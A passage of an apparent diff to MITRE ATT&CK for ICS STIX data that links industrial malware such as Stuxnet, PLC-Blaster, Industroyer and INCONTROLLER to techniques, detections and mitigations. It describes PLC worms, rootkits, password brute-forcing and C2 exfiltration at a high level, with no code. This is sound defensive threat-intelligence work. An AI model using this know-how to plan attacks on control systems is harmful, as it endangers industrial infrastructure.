2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:00:39.796Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) utilizes the PLC communication and management API to load executable Program Organization Units. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--321fc522-bc6b-4975-bee4-9098624d1e8c", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:32:18.815Z", + "description": "Monitor for network traffic originating from unknown/unexpected devices or addresses. Local network traffic metadata could be used to identify unexpected connections, including unknown/unexpected source MAC addresses connecting to ports associated with operational protocols. Also, network management protocols such as DHCP and ARP may be helpful in identifying unexpected devices. 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--b14395bd-5419-4ef4-9bd8-696936f509bb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--59c65014-1fee-4c2e-9ece-9883159bbed2", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:16:20.286Z", + "description": "Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW may be used by an adversary to prevent services from starting. For added context on adversary procedures and background see [Service Stop](https://attack.mitre.org/techniques/T1489).", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a4c81fe6-1ad9-4bba-a415-a3c099eaa2be", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 
2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:02:30.876Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) stops the execution of the user program on the target to enable the transfer of its own code. The worm then copies itself to the target and subsequently starts the target PLC again. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--9b412b1f-2dd0-4e7f-8364-f625181ba1db", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.232Z", + "relationship_type": "mitigates", + "description": "Integrating multi-factor authentication (MFA) as part of organizational policy can greatly reduce the risk of an adversary gaining access to valid credentials that may be used for additional tactics such as initial access, lateral movement, and collecting information. 
MFA can also be used to restrict access to cloud resources and APIs.\n", + "source_ref": "course-of-action--ddf3e568-f065-49e2-9106-42029a28ddbd", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--15a39e3b-124e-4e68-95b5-7b8020225c12", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:30:27.289Z", + "description": "Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. 
", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--bde941c6-2ca0-4f94-9336-027e7eee15a1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.082Z", + "relationship_type": "mitigates", + "description": "Configure internal and external firewalls to block traffic using common ports that associate to network protocols that may be unnecessary for that particular network segment.\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e6c31185-8040-4267-83d3-b217b8a92f07", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--81add433-49d8-43ec-85d5-f48fe80e56e7", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:44:21.000Z", + "description": "Devices that provide user access to the underlying operating system may allow the installation of custom software to monitor OS API execution. 
Monitoring API calls may generate a significant amount of data and may not be useful for defense unless collected under specific circumstances, since benign use of API functions are common and may be difficult to distinguish from malicious behavior. Correlation of other events with behavior surrounding API function calls using API monitoring will provide additional context to an event that may assist in determining if it is due to malicious behavior.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6ed07095-c23a-4676-807f-a544deaeb274", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee Labs October 2019", + "description": "McAfee Labs 2019, October 02 McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service What The Code Tells Us Retrieved. 2021/04/12 ", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us" + }, + { + "source_name": "SecureWorks September 2019", + "description": "SecureWorks 2019, September 24 REvil/Sodinokibi Ransomware Retrieved. 2021/04/12 ", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:05:35.788Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) sends exfiltrated data from the victims system using HTTPS POST messages sent to the C2 system. 
(Citation: McAfee Labs October 2019) (Citation: SecureWorks September 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b7f23af2-e948-4531-af56-1a1b4d03702f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.172Z", + "relationship_type": "mitigates", + "description": "Authenticate all access to field controllers before authorizing access to, or modification of, a device's state, logic, or programs. Centralized authentication techniques can help manage the large number of field controller accounts needed across the ICS.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--3478c49c-594b-4224-b7f9-2b0b09c67288", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.239Z", + "relationship_type": "mitigates", + "description": "Utilize strong cryptographic techniques and protocols to prevent eavesdropping on network communications. 
(Citation: Bastille April 2017)\n", + "source_ref": "course-of-action--7f153c28-e5f1-4764-88fb-eea1d9b0ad4a", + "target_ref": "attack-pattern--0fe075d5-beac-4d02-b93e-0f874997db72", + "external_references": [ + { + "source_name": "Bastille April 2017", + "description": "Bastille 2017, April 17 Dallas Siren Attack Retrieved. 2020/11/06 ", + "url": "https://www.bastille.net/blogs/2017/4/17/dallas-siren-attack" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--309e4558-e591-4d03-9bb9-07d30acf011f", + "created": "2021-04-12T18:49:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "McAfee Labs October 2019", + "description": "McAfee Labs 2019, October 02 McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service What The Code Tells Us Retrieved. 2021/04/12 ", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:04:11.691Z", + "description": "[REvil](https://attack.mitre.org/software/S0496) searches for all processes listed in the prc field within its configuration file and then terminates each process. 
(Citation: McAfee Labs October 2019)", + "relationship_type": "uses", + "source_ref": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "target_ref": "attack-pattern--063b5b92-5361-481a-9c3f-95492ed9a2d8", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--06fc6ec4-7857-4f59-9bbf-df373152bcfd", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:12:43.166Z", + "description": "Monitor asset alarms which may help identify a loss of communications. Consider correlating alarms with other data sources that indicate traffic has been blocked, such as network traffic. In cases where alternative methods of communicating with outstations exist alarms may still be visible even if messages over serial COM ports are blocked.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--4c12c1c8-bcef-4daf-8e5b-fca235f71d9e", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6681bc38-0b55-4714-b690-c609956b40bf", + "created": "2022-09-28T20:27:33.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. 
Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:53:47.438Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can brute force password-based authentication to Schneider PLCs over the CODESYS protocol (UDP port 1740).(Citation: CISA-AA22-103A)\n\n [INCONTROLLER](https://attack.mitre.org/software/S1045) can perform brute force guessing of passwords to OPC UA servers using a predefined list of passwords.(Citation: CISA-AA22-103A)(Citation: Wylie-22) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b48a9fea-26a5-473c-9a5d-fcc3531e1fd3", + "created": "2023-03-30T18:59:30.677Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T18:59:30.677Z", + "description": "Develop and publish policies that define acceptable information to be stored on local systems.", + "relationship_type": "mitigates", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": 
"0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f130282b-f681-455f-966b-55829842be92", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Langer Stuxnet", + "description": "Ralph Langner. (2013, November). To Kill a Centrifuge: A Technical Analysis of What Stuxnet's Creators Tried to Achieve. Retrieved December 7, 2020.", + "url": "https://www.langner.com/wp-content/uploads/2017/03/to-kill-a-centrifuge.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-17T16:00:06.894Z", + "description": "One of [Stuxnet](https://attack.mitre.org/software/S0603)'s rootkits is contained entirely in the fake s7otbxdx.dll. In order to continue existing undetected on the PLC it needs to account for at least the following situations: read requests for its own malicious code blocks, read requests for infected blocks (OB1, OB35, DP_RECV), and write requests that could overwrite Stuxnets own code. Stuxnet contains code to monitor and intercept these types of requests. The rootkit modifies these requests so that Stuxnets PLC code is not discovered or damaged. 
(Citation: Langer Stuxnet)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--efb80069-e4be-4055-bd34-06d1376b4601", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Access Management technologies can be used to enforce authorization policies and decisions, especially when existing field devices do not provide capabilities to support user identification and authentication. (Citation: McCarthy, J et al. July 2018) These technologies typically utilize an in-line network device or gateway system to prevent access to unauthenticated users, while also integrating with an authentication service to first verify user credentials.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--5a2610f6-9fff-41e1-bc27-575ca20383d4", + "external_references": [ + { + "source_name": "McCarthy, J et al. July 2018", + "description": "McCarthy, J et al. 2018, July NIST SP 1800-2 Identity and Access Management for Electric Utilities Retrieved. 
2020/09/17 ", + "url": "https://doi.org/10.6028/NIST.SP.1800-2" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--a6d8b66d-fc10-404f-b0ae-e8c66506b818", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-31T20:13:05.134Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604)'s data wiper component removes the registry image path throughout the system and overwrites all files, rendering the system unusable. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--a81696ef-c106-482c-8f80-59c30f2569fb", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--53af6987-21bb-46fd-bf85-e3eeaa74de1a", + "created": "2023-03-30T14:08:23.251Z", + "revoked": false, + "external_references": [ + { + "source_name": "CISA June 2013", + "description": "CISA 2013, June Risks of Default Passwords on the Internet Retrieved. 
2020/09/25 ", + "url": "https://us-cert.cisa.gov/ncas/alerts/TA13-175A" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:23.251Z", + "description": "Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment.(Citation: CISA June 2013)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--e767c178-e4b2-490a-b544-bb1b2d6c7de4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.109Z", + "relationship_type": "mitigates", + "description": "Application isolation will limit the other processes and system features an exploited target can access. 
Examples of built in features are software restriction policies, AppLocker for Windows, and SELinux or AppArmor for Linux.\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--33486e89-f0f4-4507-9f13-48a8f22c8ac8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.092Z", + "relationship_type": "mitigates", + "description": "Review vendor documents and security alerts for potentially unknown or overlooked default credentials within existing devices\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--8bb4538f-f16f-49f0-a431-70b5444c7349", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3d005ed8-77d3-4fed-9dd5-7e39ba8cb50a", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 
2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:08.899Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) calls system function blocks which are part of the operating system running on the PLC. Theyre used to execute system tasks, such as reading the system clock (SFC1) and generating data blocks on the fly. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e8990f9-475b-43fe-91fb-25cc0634f0aa", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:00:56.539Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--535c5160-17e0-44eb-9f4b-1a8e216b56a2", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:00.053Z", + "description": "The execution on the PLC can be stopped by violating the cycle time limit. The [PLC-Blaster](https://attack.mitre.org/software/S1006) implements an endless loop triggering an error condition within the PLC with the impact of a DoS. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67e11f38-9f68-4989-8de3-da65af52063e", + "created": "2023-03-30T19:24:54.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 ESET April 2022", + "description": "ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.", + "url": "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). 
Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:10:14.646Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) has the capability to poll a target device about its connection status, data transfer status, Common Address (CA), Information Object Addresses (IOAs), and IO state values across multiple priority levels.(Citation: Industroyer2 Forescout July 2022)(Citation: Industroyer2 ESET April 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5212f36b-216f-4e32-8b64-3b4c94dfada5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-10T14:13:17.429Z", + "modified": "2022-05-06T17:47:24.188Z", + "relationship_type": "mitigates", + "description": "Enforce strong password requirements to prevent password brute force methods for lateral movement.\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", 